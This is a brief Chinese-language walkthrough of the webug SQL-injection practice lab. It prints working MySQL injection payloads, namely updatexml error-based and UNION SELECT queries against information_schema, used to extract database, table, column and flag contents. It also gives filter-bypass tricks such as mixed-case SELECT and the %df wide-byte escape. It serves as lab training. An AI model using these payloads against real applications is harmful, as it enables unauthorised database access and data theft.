0x00 SQL注入
熟悉的感觉,熟悉的配方,还是原来的味道
0x01 显错注入
打的时候吓一跳。。原来就是个本地的,给自己打广告不好吗。。。
输入'以后就直接报错了,然后就一翻操作。
库1' and updatexml(1,concat(0x7e,database(),0x7e),1) %23
表1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='webug' ),0x7e),1) %23
列1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='webug' and table_name='flag' ),0x7e),1) %23
字段1' and updatexml(1,concat(0x7e,(select group_concat(id,0x7e,flag) from flag ),0x7e),1) %23
提交flag完事
0x02 布尔注入
输入2的时候有输出hello
同样是'闭合,输入2' and 1=2无回显。
这个有回显,可以用联合查询,这边懒一下就不用盲注了。。
库-2' union select 1,database() %23
表-2' union select 1,group_concat(table_name) from information_schema.tables where table_schema='webug' %23
列-2' union select 1,group_concat(column_name) from information_schema.columns where table_schema='webug' and table_name='flag'%23
字段-2' union select 1,group_concat(0x7e,id,0x7e,flag,0x7e) from flag%23
没想到和之前是一样的,算了,后面不写详细的了,没意思了- -!
0x03 延时注入
。。。联合查询都行,啥都没过滤,有点弟弟。
0x04 post注入
换界面了,这界面有点帅。试了一会,登陆/注册功能无法使用,只能使用搜索了,确实是有post注入。
0x05 过滤注入
没看出来过滤了啥,和上一关一样。
看了源码,原来是过滤了大小写的select,小小写混合就行了。。
0x06 宽字节注入
好骚阿。。。直接加%df,具体原理看sql宽字节注入详解